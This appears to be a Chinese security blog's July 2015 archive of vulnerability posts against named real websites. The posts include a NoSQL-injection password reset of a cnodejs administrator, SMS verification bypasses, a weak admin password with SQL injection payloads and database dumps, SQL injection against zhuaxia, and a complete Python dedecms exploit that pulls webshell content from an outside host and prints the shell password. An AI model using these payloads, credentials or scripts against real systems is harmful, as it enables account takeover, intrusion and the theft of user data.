月度归档:2015年07月

nodeclub注入漏洞可重置用户密码

这个nodeclub(https://github.com/cnodejs/nodeclub/)可能用的人不多,弄着玩一下从github上下载nodeclub的源码。 controllers sign.js

  exports.reset_pass = function (req, res, next) {    var key = req.query.key;    var name = req.query.name;    User.getUserByNameAndKey(name, key, function (err, user) {      if (!user) {        res.status(403);        return res.render('notify/notify', {error: '信息有误,密码无法重置。'});      }

可以看到,key和name未经判断进入了 User的 getUserByNameAndKey proxy user.js
exports.getUserByNameAndKey = function (loginname, key, callback) {
  User.findOne({loginname: loginname, retrieve_key: key}, callback);
};
为了测试这个问题,首先,我们把目标定为 cnodejs 的管理者之一 alsotang,从他的github上可以知道他的邮箱是 alsotang@gmail.com然后在https://cnodejs.org/search_pass找回密码,

接着,根据之前的问题,不难简单的构造出以下请求。https://cnodejs.org/reset_pass?name=alsotang&key[$ne]=111111111其中,name是目标用户名,让key不等于1111111,此时会返回一个正常的页面。

如果,我们随便设置一个key,例如:https://cnodejs.org/reset_pass?name=alsotang&key=111111111则会返回一个错误的页面:

如此一来,我们就可以对key参数通过 $regex来进行盲注。例如:https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5 返回正常https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^6返回错误https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5f返回正常….测试代码:见“测试代码”部分。运行程序后,

跑出的key:

然后拿着key去重置密码,密码被重置为 wooyun,登录后~~

见:https://cnodejs.org/user/alsotang 个人介绍。

继续阅读

我爱我家某分站逻辑缺陷可登录任意用户及任意手机号注册

我爱我家官网:1.手机验证码登录方式,可登录任意手机号用户,客户端直接获取验证码2.任意号码注册,客户端直接获取验证码1.手机验证码登录方式,可登录任意手机号用户地址:http://hz.5i5j.com/regLogin/phoneLogin

输入任意手机号码,填写图片验证码,代理拦截

输入手机验证码:271531,登录成功

2.任意号码注册,客户端直接获取验证码地址:http://hz.5i5j.com/regLogin/register

点击获取验证码,输入图片验证码,代理拦截

输入验证码,注册成功

修复方案:
服务器端验证验证码,登录模块目前相当于废了啊
 

我是如何在Periscope管理面板中绕过Google认证的

Periscope是一个属于Twitter的iOS/Android应用,主要用于现场直播。通过一个基于WEB的管理面板管理着数百万的用户,你可以通过访问admin.periscope.tv获悉。

当你浏览站点,所有的请求都讲重定向到/auth?redirect=/(这是由于我们没有一个有效的会话),进而重定向到谷歌身份验证

继续阅读

为WordPress开启洋葱扫码登录或令牌认证登录

 最近一段时间,“游侠安全网”有几篇文章介绍了“洋葱”——当然不是吃的那款,是DNSPod创始人吴洪声最新创业的项目,一款对密码进行安全加固的软件,它还可以让你“刷”密码的过程看上去更拉风。

那么,作为站长,网路游侠我是非常想体验一下的,今天就花了一些时间(只有大概5分钟,如果是第二次配置的话,大概3分钟就够了)来给基于WordPress构建的 www.youxia.org 集成了洋葱的登录方式。下面说所过程:

继续阅读

自如友家房源配置系统工单存在信息泄露漏洞

房源配置系统工单信息泄露(房源编号、合同号、房屋地址、合同签订时间),可遍历。一旦这些信息落入竞争对手手中,严重性不言而喻

http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459130

http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459230

http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459330

继续阅读

我爱网某站弱口令后台注入涉及商家信息泄漏

后台地址
http://admin.55bbs.com/login.php

弱口令 lijun lijun123直接进去.

后台一个搜索处抓包

POST /adpublish/customer_list.php HTTP/1.1
Host: article.55bbs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://article.55bbs.com/adpublish/customer_list.php
Cookie: ID=320; S_uid=lijun; S_checkcode=c7c0d53884ee86346f5dc0d9d27b7e5e; S_power_limit=N
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
text=&workname=nixiaolei&select8=1&button=%B2%E9%D1%AF

经测试参数select8为注入点 。

直接丢sqlmap
Parameter: select8 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind – WHERE or HAVING clause
    Payload: text=&workname=nixiaolei&select8=1 AND 7097=7097&button=%B2%E9%D1%AF
    Type: UNION query
    Title: MySQL UNION query (33) – 11 columns
    Payload: text=&workname=nixiaolei&select8=1 UNION ALL SELECT 33,33,33,33,CONCAT(0x716b627a71,0x48654a5270764e595443,0x717a786a71),33,33,33,33,33,33#&button=%B2%E9%D1%AF

[16:37:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
有3个库。
available databases [3]:
[*] Admanger
[*] information_schema
[*] test

表挺多的,有429张。其中也有一些商家的重要信息。
Database: Admanger
[429 tables]
+—————————–+
| 55_bao10_3phplog            |
| 55_bao10_7_4                |
| 55_bao10_accesslog          |
| 55_bao10                    |
| tbl_chuangyi1-2             |
| activity                    |
| activity_0                  |
| activity_122                |
| activity_140                |
| activity_144                |
| activity_145                |
| activity_146                |
| activity_163                |
| activity_164                |
| activity_165                |
| activity_166                |
| activity_167                |
| activity_168                |
| activity_169                |
| activity_170                |
| activity_171                |
| activity_172                |
| activity_173                |
| activity_178                |
| activity_180                |
| activity_181                |
| activity_183                |
| activity_184                |
| activity_185                |
| activity_186                |

| activity_187                |
| activity_189                |
| activity_190                |
| activity_191                |
| activity_192                |
| activity_193                |
| activity_194                |
| activity_196                |
| activity_197                |
| activity_198                |
| activity_199                |
| activity_200                |
| activity_201                |
| activity_202                |
| activity_203                |
| activity_204                |
| activity_205                |
| activity_206                |
| activity_207                |
| activity_208                |
| activity_210                |
| activity_211                |
| activity_212                |
| activity_213                |
| activity_214                |
| activity_215                |
| activity_216                |
| activity_217                |
| activity_218                |
| activity_219                |
| activity_220                |
| activity_221                |
| activity_222                |
| activity_223                |
| activity_225                |
| activity_226                |
| activity_227                |
| activity_228                |
| activity_229                |
| activity_230                |
| activity_231                |
| activity_232                |
| activity_233                |
| activity_237                |
| activity_238                |
| activity_239                |

 

继续阅读

dedecms远程代码执行利用脚本

  #! /usr/bin/env python  #coding=utf-8  #Joseph(小续)     import requests  import sys  import re  def main():      try:          url="http://"+sys.argv[1].strip('http://')      except IndexError:          print '''          poc: dede.py http://www.baidu.com/          '''      payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"      urlpoc=url+payload      code=requests.get(urlpoc).status_code      if code==200:          print u"恭喜存在此漏洞"          print u"Ongoing attacks--->>>>>"          exploit(url)          pass      else:          print u"sorry 漏洞正在挣扎"          pass  def exploit(url):      urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://www.mrjking.com/"      htmlcontent=requests.get(urlpoc).content      Probe=re.compile(r'存在')      if Probe.findall(htmlcontent):          print u'''          ver:getshell成功          shell:url+/data/tang3.php?a=0  密码为:c          '''          pass      else:          print u"请看远程地址是否已经不可用"          pass  if __name__ == '__main__':      main()  

 

抓虾网主站多枚sql注入

抓虾网主站多枚sql注入

第一枚:URL:http://www.zhuaxia.com/php_controller/myFeedController.php?action=channelInfo&chid=833&customerId=29034823&lastid=0&show_all_item=1&sourceid=0&stamp=0.09998915647156537&version=200812241245存在问题参数:chidpayload::1.布尔盲注 AND 1=1 、AND 1=22.时间盲注 AND sleep(XX)这里是字符型注入第二枚:URL:http://www.zhuaxia.com/register_check.php?logId=165POST参数:blog_url=1&code=94102&do_reg=1&email=test%40email.com&ivc=ARkGQlYUBxw%3d&nickname=1&password=g00dPa%24%24w0rD&password_second=g00dPa%24%24w0rD存在问题参数是email报错注入payload:' and select XXX from (select concat(xx) from ionfromation.XX ) and 'a'='a这里首先应该关闭显错。available databases [10]:[*] dba[*] information_schema[*] mysql[*] percona[*] performance_schema[*] test[*] tudui[*] wordpress[*] wordpress_mu[*] XiaoNei这里的tudui是一个重要的数据库含有大量的表然后跑其中前五个的数据如下图:

这是一个用户信息的表,仅截取字段的图举例,后面是数据未截图出来。然后看了一下XiaoNei这个库

可以看到用户信息有915万多具体到数据举例前五

继续阅读